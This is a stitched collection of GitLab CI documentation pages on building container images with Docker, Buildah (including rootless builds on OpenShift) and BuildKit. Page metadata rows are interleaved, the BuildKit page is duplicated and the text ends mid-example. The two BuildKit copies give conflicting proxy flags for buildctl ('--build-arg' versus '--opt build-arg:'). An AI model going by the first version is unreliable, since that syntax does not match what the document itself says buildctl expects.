[`DOCKER_AUTH_CONFIG`](using_docker_images.md#determine-your-docker_auth_config-data) defined, you can use the variable and save it in `~/.docker/config.json`. You can define this authentication in several ways: - In [`pre_build_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) in the runner configuration file. - In [`before_script`](../yaml/_index.md#before_script). - In [`script`](../yaml/_index.md#script). The following example shows [`before_script`](../yaml/_index.md#before_script). The same commands apply for any solution you implement. 
```yaml default: image: docker:24.0.5 services: - docker:24.0.5-dind variables: DOCKER_TLS_CERTDIR: "/certs" build: stage: build before_script: - mkdir -p $HOME/.docker - echo $DOCKER_AUTH_CONFIG > $HOME/.docker/config.json script: - docker build -t my-docker-image . - docker run my-docker-image /script/to/run/tests ```
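The `auth` value in `config.json` is the Base64 encoding of `username:password`. A sketch that reproduces the encoded value from the earlier example (`my_username`/`my_password` are the placeholder credentials from that example) and validates a generated file, writing to a temporary directory instead of `$HOME/.docker`:

```shell
# The "auth" field in config.json is base64("username:password").
# my_username/my_password are placeholder credentials, not real values.
AUTH=$(printf '%s:%s' 'my_username' 'my_password' | base64 | tr -d '\n')
echo "$AUTH"   # → bXlfdXNlcm5hbWU6bXlfcGFzc3dvcmQ=

# Simulate what the before_script does, then check the file parses as JSON.
DOCKER_AUTH_CONFIG="{\"auths\":{\"https://index.docker.io/v1/\":{\"auth\":\"$AUTH\"}}}"
CONFIG_DIR=$(mktemp -d)            # stand-in for $HOME/.docker
echo "$DOCKER_AUTH_CONFIG" > "$CONFIG_DIR/config.json"
python3 -m json.tool "$CONFIG_DIR/config.json" > /dev/null && echo "valid JSON"
```

The `tr -d '\n'` matters because `base64` wraps long output across lines, which would corrupt the JSON.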
https://docs.gitlab.com/ci/docker
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
_index.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Docker integration
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can incorporate [Docker](https://www.docker.com) into your CI/CD workflow in two primary ways: - [Run your CI/CD jobs](using_docker_images.md) in Docker containers. Create jobs to test, build, or publish applications that run in Docker containers. For example, use a Node image from Docker Hub so your job runs in a container with all the Node dependencies you need. - Use [Docker Build](using_docker_build.md) or [BuildKit](using_buildkit.md) to build Docker images. Create jobs that build Docker images and publish them to a container registry. BuildKit provides multiple approaches including rootless builds.

https://docs.gitlab.com/ci/buildah_rootless_multi_arch
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/buildah_rootless_multi_arch.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
buildah_rootless_multi_arch.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use Buildah to build multi-platform images
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use Buildah to build images for multiple CPU architectures. Multi-platform builds create images that work across different hardware platforms, and Docker automatically selects the appropriate image for each deployment target. ## Prerequisites - A Dockerfile to build the image from - (Optional) GitLab runners running on different CPU architectures ## Build multi-platform images To build multi-platform images with Buildah: 1. Configure separate build jobs for each target architecture. 1. Create a manifest job that combines the architecture-specific images. 1. Configure the manifest job to push the combined manifest to your registry. Running jobs on their respective architectures avoids performance issues from CPU instruction translation. However, you can run both builds on a single architecture if needed. Building for non-native architecture may result in slower build times. The following example uses two [GitLab-hosted runners on Linux](../../ci/runners/hosted_runners/linux.md): - `saas-linux-small-arm64` - `saas-linux-small-amd64` ```yaml stages: - build variables: STORAGE_DRIVER: vfs BUILDAH_FORMAT: docker FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE:latest" default: image: quay.io/buildah/stable before_script: - echo "$CI_REGISTRY_PASSWORD" | buildah login -u "$CI_REGISTRY_USER" --password-stdin $CI_REGISTRY build-amd64: stage: build tags: - saas-linux-small-amd64 script: - buildah build --platform=linux/amd64 -t $CI_REGISTRY_IMAGE:amd64 . - buildah push $CI_REGISTRY_IMAGE:amd64 build-arm64: stage: build tags: - saas-linux-small-arm64 script: - buildah build --platform=linux/arm64/v8 -t $CI_REGISTRY_IMAGE:arm64 . 
- buildah push $CI_REGISTRY_IMAGE:arm64 create_manifest: stage: build needs: ["build-arm64", "build-amd64"] tags: - saas-linux-small-amd64 script: - buildah manifest create $FQ_IMAGE_NAME - buildah manifest add $FQ_IMAGE_NAME docker://$CI_REGISTRY_IMAGE:amd64 - buildah manifest add $FQ_IMAGE_NAME docker://$CI_REGISTRY_IMAGE:arm64 - buildah manifest push --all $FQ_IMAGE_NAME ``` This pipeline creates architecture-specific images tagged with `amd64` and `arm64`, then combines them into a single manifest available under the `latest` tag. ## Troubleshooting ### Build fails with authentication errors If you encounter registry authentication failures: - Verify that `CI_REGISTRY_USER` and `CI_REGISTRY_PASSWORD` variables are available. - Check that you have push permissions to the target registry. - For external registries, ensure authentication credentials are correctly configured in your project's CI/CD variables. ### Multi-platform builds fail For multi-platform build issues: - Verify that base images in your `Dockerfile` support the target architectures. - Check that architecture-specific dependencies are available for all target platforms. - Consider using conditional statements in your `Dockerfile` for architecture-specific logic.
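Once `create_manifest` finishes, `buildah manifest inspect $FQ_IMAGE_NAME` returns an OCI image index listing both platforms. A minimal sketch of reading the platform list out of such an index (the JSON below is sample data shaped like the inspect output, not a live registry call):

```shell
# Sample OCI image index, shaped like `buildah manifest inspect` output.
MANIFEST='{"schemaVersion":2,"manifests":[
  {"platform":{"os":"linux","architecture":"amd64"}},
  {"platform":{"os":"linux","architecture":"arm64"}}]}'
PLATFORMS=$(echo "$MANIFEST" | python3 -c '
import json, sys
for m in json.load(sys.stdin)["manifests"]:
    p = m["platform"]
    print(p["os"] + "/" + p["architecture"])
')
echo "$PLATFORMS"
```

If one of the expected platforms is missing from the index, re-check that both architecture-specific push jobs succeeded before the manifest job ran.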
https://docs.gitlab.com/ci/buildah_rootless_tutorial
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/buildah_rootless_tutorial.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
buildah_rootless_tutorial.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Use Buildah in a rootless container with GitLab Runner Operator on OpenShift
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This tutorial teaches you how to successfully build images using the `buildah` tool, with GitLab Runner deployed using [GitLab Runner Operator](https://gitlab.com/gitlab-org/gl-openshift/gitlab-runner-operator) on an OpenShift cluster. This guide is an adaptation of [using Buildah to build images in a rootless OpenShift container](https://github.com/containers/buildah/blob/main/docs/tutorials/05-openshift-rootless-build.md) documentation for GitLab Runner Operator. To complete this tutorial, you will: 1. [Configure the Buildah image](#configure-the-buildah-image) 1. [Configure the service account](#configure-the-service-account) 1. [Configure the job](#configure-the-job) ## Prerequisites - A runner already deployed to a `gitlab-runner` namespace. ## Configure the Buildah image We start by preparing a custom image based on the `quay.io/buildah/stable:v1.23.1` image. 1. Create the `Containerfile-buildah` file: ```shell cat > Containerfile-buildah <<EOF FROM quay.io/buildah/stable:v1.23.1 RUN touch /etc/subgid /etc/subuid \ && chmod g=u /etc/subgid /etc/subuid /etc/passwd \ && echo build:10000:65536 > /etc/subuid \ && echo build:10000:65536 > /etc/subgid # Use chroot because the default runc does not work when running rootless RUN echo "export BUILDAH_ISOLATION=chroot" >> /home/build/.bashrc # Use VFS because fuse does not work RUN mkdir -p /home/build/.config/containers \ && (echo '[storage]';echo 'driver = "vfs"') > /home/build/.config/containers/storage.conf # The buildah container will run as `build` user USER build WORKDIR /home/build EOF ``` 1. Build and push the Buildah image to a container registry. Let's push to the [GitLab container registry](../../user/packages/container_registry/_index.md): ```shell docker build -f Containerfile-buildah -t registry.example.com/group/project/buildah:1.23.1 . 
docker push registry.example.com/group/project/buildah:1.23.1 ``` ## Configure the service account For these steps, you need to run the commands in a terminal connected to the OpenShift cluster. 1. Run this command to create a service account named `buildah-sa`: ```shell oc create -f - <<EOF apiVersion: v1 kind: ServiceAccount metadata: name: buildah-sa namespace: gitlab-runner EOF ``` 1. Give the created service account the ability to run with `anyuid` [SCC](https://docs.openshift.com/container-platform/4.3/authentication/managing-security-context-constraints.html): ```shell oc adm policy add-scc-to-user anyuid -z buildah-sa -n gitlab-runner ``` 1. Use a [runner configuration template](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#customize-configtoml-with-a-configuration-template) to configure Operator to use the service account we just created. Create a `custom-config.toml` file that contains: ```toml [[runners]] [runners.kubernetes] service_account_overwrite_allowed = "buildah-*" ``` 1. Create a `ConfigMap` named `custom-config-toml` from the `custom-config.toml` file: ```shell oc create configmap custom-config-toml --from-file config.toml=custom-config.toml -n gitlab-runner ``` 1. 
Set the `config` property of the `Runner` by updating its [Custom Resource Definition (CRD) file](https://docs.gitlab.com/runner/install/operator.html#install-gitlab-runner): ```yaml apiVersion: apps.gitlab.com/v1beta2 kind: Runner metadata: name: buildah-runner spec: gitlabUrl: https://gitlab.example.com token: gitlab-runner-secret config: custom-config-toml ``` ## Configure the job The final step is to set up a GitLab CI/CD configuration file in your project to use the image we built and the configured service account: ```yaml build: stage: build image: registry.example.com/group/project/buildah:1.23.1 variables: STORAGE_DRIVER: vfs BUILDAH_FORMAT: docker BUILDAH_ISOLATION: chroot FQ_IMAGE_NAME: "$CI_REGISTRY_IMAGE/test" KUBERNETES_SERVICE_ACCOUNT_OVERWRITE: "buildah-sa" before_script: # Log in to the GitLab container registry - buildah login -u "$CI_REGISTRY_USER" --password $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - buildah images - buildah build -t $FQ_IMAGE_NAME - buildah images - buildah push $FQ_IMAGE_NAME ``` The job should use the image that we built as the value of the `image` keyword. The `KUBERNETES_SERVICE_ACCOUNT_OVERWRITE` variable should have the value of the service account name that we created. Congratulations, you've successfully built an image with Buildah in a rootless container! ## Troubleshooting There is a [known issue](https://github.com/containers/buildah/issues/4049) with running as non-root. You might need to use a [workaround](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#configure-setfcap) if you are using an OpenShift runner.
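The `service_account_overwrite_allowed = "buildah-*"` setting means the runner only honors a `KUBERNETES_SERVICE_ACCOUNT_OVERWRITE` value whose name matches that pattern. A rough sketch of the check, using shell `case` globbing as an approximation of the runner's pattern matching:

```shell
# Approximates the runner's service_account_overwrite_allowed check:
# only service account names matching "buildah-*" may be used.
allowed_pattern_check() {
  case "$1" in
    buildah-*) echo "allowed" ;;
    *)         echo "rejected" ;;
  esac
}
allowed_pattern_check "buildah-sa"   # the account created in this tutorial
allowed_pattern_check "default"      # any non-matching account is rejected
```

If the override is rejected, the job fails at pod creation, so keep the service account name and the allowed pattern in sync.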
https://docs.gitlab.com/ci/using_buildkit
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/using_buildkit.md
2025-08-13
doc/ci/docker
[ "doc", "ci", "docker" ]
using_buildkit.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Build Docker images with BuildKit
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} [BuildKit](https://docs.docker.com/build/buildkit/) is the build engine used by Docker and provides multi-platform builds and build caching. ## BuildKit methods BuildKit offers the following methods to build Docker images: | Method | Security requirement | Commands | Use when you need | | ----------------- | ------------------------ | ------------------------ | ----------------- | | BuildKit rootless | No privileged containers | `buildctl-daemonless.sh` | Maximum security or a replacement for Kaniko | | Docker Buildx | Requires `docker:dind` | `docker buildx` | Familiar Docker workflow | | Native BuildKit | Requires `docker:dind` | `buildctl` | Advanced BuildKit control | ## Prerequisites - GitLab Runner with Docker executor - Docker 19.03 or later to use Docker Buildx - A project with a `Dockerfile` ## BuildKit rootless BuildKit in standalone mode provides rootless image builds without Docker daemon dependency. This method eliminates privileged containers entirely and provides a direct replacement for Kaniko builds. Key differences from other methods: - Uses the `moby/buildkit:rootless` image - Includes `BUILDKITD_FLAGS: --oci-worker-no-process-sandbox` for rootless operation - Uses `buildctl-daemonless.sh` to manage BuildKit daemon automatically - No Docker daemon or privileged container dependency - Requires manual registry authentication setup ### Authenticate with container registries GitLab CI/CD provides automatic authentication for the GitLab container registry through predefined variables. For BuildKit rootless, you must manually create the Docker configuration file. 
#### Authenticate with the GitLab container registry GitLab automatically provides these predefined variables: - `CI_REGISTRY`: Registry URL - `CI_REGISTRY_USER`: Registry username - `CI_REGISTRY_PASSWORD`: Registry password To configure authentication for rootless builds, add a `before_script` configuration to your jobs. For example: ```yaml before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json ``` #### Authenticate with multiple registries To authenticate with additional container registries, combine authentication entries in your `before_script` section. For example: ```yaml before_script: - mkdir -p ~/.docker - | echo "{ \"auths\": { \"${CI_REGISTRY}\": { \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\" }, \"docker.io\": { \"auth\": \"$(printf "%s:%s" "${DOCKER_HUB_USER}" "${DOCKER_HUB_PASSWORD}" | base64 | tr -d '\n')\" } } }" > ~/.docker/config.json ``` #### Authenticate with the dependency proxy To pull images through the GitLab dependency proxy, configure the authentication in your `before_script` section. For example: ```yaml before_script: - mkdir -p ~/.docker - | echo "{ \"auths\": { \"${CI_REGISTRY}\": { \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\" }, \"$(echo -n $CI_DEPENDENCY_PROXY_SERVER | awk -F[:] '{print $1}')\": { \"auth\": \"$(printf "%s:%s" ${CI_DEPENDENCY_PROXY_USER} "${CI_DEPENDENCY_PROXY_PASSWORD}" | base64 | tr -d '\n')\" } } }" > ~/.docker/config.json ``` For more information, see [authenticate within CI/CD](../../user/packages/dependency_proxy/_index.md#authenticate-within-cicd). 
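The `awk -F[:] '{print $1}'` fragment in the dependency proxy example strips an optional port from `CI_DEPENDENCY_PROXY_SERVER`, because the key in `auths` must be the bare hostname. A sketch with a placeholder server value:

```shell
# CI_DEPENDENCY_PROXY_SERVER can include a port (placeholder value below);
# the auths key in config.json needs only the hostname.
CI_DEPENDENCY_PROXY_SERVER="gitlab.example.com:443"
PROXY_HOST=$(echo -n "$CI_DEPENDENCY_PROXY_SERVER" | awk -F: '{print $1}')
echo "$PROXY_HOST"   # → gitlab.example.com
```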
### Build images in rootless mode To build images without Docker daemon dependency, add a job similar to this example: ```yaml build-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Build multi-platform images in rootless mode To build images for multiple architectures in rootless mode, configure your job to specify the target platforms. For example: ```yaml build-multiarch-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --opt platform=linux/amd64,linux/arm64 \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Use caching in rootless mode To enable registry-based caching for faster subsequent builds, configure cache import and export in your build job. For example: ```yaml build-cached-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox CACHE_IMAGE: $CI_REGISTRY_IMAGE:cache before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. 
\ --export-cache type=registry,ref=$CACHE_IMAGE \ --import-cache type=registry,ref=$CACHE_IMAGE \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` ### Use a registry mirror in rootless mode Registry mirrors provide faster image pulls and can help with rate limiting or network restrictions. To configure registry mirrors, create a `buildkit.toml` file that specifies the mirror endpoints. For example: ```yaml build-mirror-rootless: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox --config /tmp/buildkit.toml before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json - cat <<'EOF' > /tmp/buildkit.toml [registry."docker.io"] mirrors = ["mirror.example.com"] EOF script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace `mirror.example.com` with your registry mirror URL. ### Configure proxy settings If your GitLab Runner operates behind an HTTP(S) proxy, configure proxy settings as variables in your job. For example: ```yaml build-behind-proxy: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox http_proxy: <your-proxy> https_proxy: <your-proxy> no_proxy: <your-no-proxy> before_script: - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. 
\ --build-arg http_proxy=$http_proxy \ --build-arg https_proxy=$https_proxy \ --build-arg no_proxy=$no_proxy \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace `<your-proxy>` and `<your-no-proxy>` with your proxy configuration. ### Add custom certificates To push to a registry using custom CA certificates, add the certificate to the container's certificate store before building. For example: ```yaml build-with-custom-certs: image: moby/buildkit:rootless stage: build variables: BUILDKITD_FLAGS: --oci-worker-no-process-sandbox before_script: - | echo "-----BEGIN CERTIFICATE----- ... -----END CERTIFICATE-----" >> /etc/ssl/certs/ca-certificates.crt - mkdir -p ~/.docker - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json script: - | buildctl-daemonless.sh build \ --frontend dockerfile.v0 \ --local context=. \ --local dockerfile=. \ --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true ``` In this example, replace the certificate placeholder with your actual certificate content. ## Migrate from Kaniko to BuildKit BuildKit rootless is a secure alternative for Kaniko. It offers improved performance, better caching, and enhanced security features while maintaining rootless operation. ### Update your configuration Update your existing Kaniko configuration to use the BuildKit rootless method. 
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Build Docker images with BuildKit
breadcrumbs:
- doc
- ci
- docker
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

[BuildKit](https://docs.docker.com/build/buildkit/) is the build engine used by Docker and provides
multi-platform builds and build caching.

## BuildKit methods

BuildKit offers the following methods to build Docker images:

| Method            | Security requirement     | Commands                 | Use when you need |
| ----------------- | ------------------------ | ------------------------ | ----------------- |
| BuildKit rootless | No privileged containers | `buildctl-daemonless.sh` | Maximum security or a replacement for Kaniko |
| Docker Buildx     | Requires `docker:dind`   | `docker buildx`          | Familiar Docker workflow |
| Native BuildKit   | Requires `docker:dind`   | `buildctl`               | Advanced BuildKit control |

## Prerequisites

- GitLab Runner with Docker executor
- Docker 19.03 or later to use Docker Buildx
- A project with a `Dockerfile`

## BuildKit rootless

BuildKit in standalone mode provides rootless image builds without Docker daemon dependency.
This method eliminates privileged containers entirely and provides a direct replacement for Kaniko builds.

Key differences from other methods:

- Uses the `moby/buildkit:rootless` image
- Includes `BUILDKITD_FLAGS: --oci-worker-no-process-sandbox` for rootless operation
- Uses `buildctl-daemonless.sh` to manage the BuildKit daemon automatically
- No Docker daemon or privileged container dependency
- Requires manual registry authentication setup

### Authenticate with container registries

GitLab CI/CD provides automatic authentication for the GitLab container registry through predefined variables.
For BuildKit rootless, you must manually create the Docker configuration file.

#### Authenticate with the GitLab container registry

GitLab automatically provides these predefined variables:

- `CI_REGISTRY`: Registry URL
- `CI_REGISTRY_USER`: Registry username
- `CI_REGISTRY_PASSWORD`: Registry password

To configure authentication for rootless builds, add a `before_script` configuration to your jobs.
For example:

```yaml
before_script:
  - mkdir -p ~/.docker
  - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
```

#### Authenticate with multiple registries

To authenticate with additional container registries, combine authentication entries in your `before_script` section.
For example:

```yaml
before_script:
  - mkdir -p ~/.docker
  - |
    echo "{
      \"auths\": {
        \"${CI_REGISTRY}\": {
          \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\"
        },
        \"docker.io\": {
          \"auth\": \"$(printf "%s:%s" "${DOCKER_HUB_USER}" "${DOCKER_HUB_PASSWORD}" | base64 | tr -d '\n')\"
        }
      }
    }" > ~/.docker/config.json
```

#### Authenticate with the dependency proxy

To pull images through the GitLab dependency proxy, configure the authentication in your `before_script` section.
For example:

```yaml
before_script:
  - mkdir -p ~/.docker
  - |
    echo "{
      \"auths\": {
        \"${CI_REGISTRY}\": {
          \"auth\": \"$(printf "%s:%s" "${CI_REGISTRY_USER}" "${CI_REGISTRY_PASSWORD}" | base64 | tr -d '\n')\"
        },
        \"$(echo -n $CI_DEPENDENCY_PROXY_SERVER | awk -F[:] '{print $1}')\": {
          \"auth\": \"$(printf "%s:%s" ${CI_DEPENDENCY_PROXY_USER} "${CI_DEPENDENCY_PROXY_PASSWORD}" | base64 | tr -d '\n')\"
        }
      }
    }" > ~/.docker/config.json
```

For more information, see [authenticate within CI/CD](../../user/packages/dependency_proxy/_index.md#authenticate-within-cicd).
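Because the same authentication `before_script` is needed in every rootless build job, you might prefer to define it once and reuse it with `extends`. A minimal sketch, assuming you are comfortable with hidden jobs (the `.buildkit-registry-auth` name is illustrative, not a GitLab-defined keyword):

```yaml
# Illustrative hidden job that holds the shared authentication setup.
.buildkit-registry-auth:
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json

# Build jobs inherit the before_script through extends.
build-rootless:
  extends: .buildkit-registry-auth
  image: moby/buildkit:rootless
  stage: build
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

Keep in mind that `extends` replaces array values rather than appending to them, so a job that defines its own `before_script` overrides the inherited one.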
### Build images in rootless mode

To build images without Docker daemon dependency, add a job similar to this example:

```yaml
build-rootless:
  image: moby/buildkit:rootless
  stage: build
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

### Build multi-platform images in rootless mode

To build images for multiple architectures in rootless mode, configure your job to specify the target platforms.
For example:

```yaml
build-multiarch-rootless:
  image: moby/buildkit:rootless
  stage: build
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --opt platform=linux/amd64,linux/arm64 \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

### Use caching in rootless mode

To enable registry-based caching for faster subsequent builds, configure cache import and export in your build job.
For example:

```yaml
build-cached-rootless:
  image: moby/buildkit:rootless
  stage: build
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox
    CACHE_IMAGE: $CI_REGISTRY_IMAGE:cache
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --export-cache type=registry,ref=$CACHE_IMAGE \
        --import-cache type=registry,ref=$CACHE_IMAGE \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

### Use a registry mirror in rootless mode

Registry mirrors provide faster image pulls and can help with rate limiting or network restrictions.
To configure registry mirrors, create a `buildkit.toml` file that specifies the mirror endpoints.
For example:

```yaml
build-mirror-rootless:
  image: moby/buildkit:rootless
  stage: build
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox --config /tmp/buildkit.toml
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
    - |
      cat <<'EOF' > /tmp/buildkit.toml
      [registry."docker.io"]
      mirrors = ["mirror.example.com"]
      EOF
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

In this example, replace `mirror.example.com` with your registry mirror URL.

### Configure proxy settings

If your GitLab Runner operates behind an HTTP(S) proxy, configure proxy settings as variables in your job.
For example:

```yaml
build-behind-proxy:
  image: moby/buildkit:rootless
  stage: build
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox
    http_proxy: <your-proxy>
    https_proxy: <your-proxy>
    no_proxy: <your-no-proxy>
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --opt build-arg:http_proxy=$http_proxy \
        --opt build-arg:https_proxy=$https_proxy \
        --opt build-arg:no_proxy=$no_proxy \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

In this example, replace `<your-proxy>` and `<your-no-proxy>` with your proxy configuration.
With `buildctl`, build arguments are passed with `--opt build-arg:<name>=<value>`.

### Add custom certificates

To push to a registry using custom CA certificates, add the certificate to the container's certificate store before building.
For example:

```yaml
build-with-custom-certs:
  image: moby/buildkit:rootless
  stage: build
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox
  before_script:
    - |
      echo "-----BEGIN CERTIFICATE-----
      ...
      -----END CERTIFICATE-----" >> /etc/ssl/certs/ca-certificates.crt
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

In this example, replace the certificate placeholder with your actual certificate content.

## Migrate from Kaniko to BuildKit

BuildKit rootless is a secure alternative to Kaniko. It offers improved performance, better caching,
and enhanced security features while maintaining rootless operation.

### Update your configuration

Update your existing Kaniko configuration to use the BuildKit rootless method.
For example:

Before, with Kaniko:

```yaml
build:
  image:
    name: gcr.io/kaniko-project/executor:debug
    entrypoint: [""]
  script:
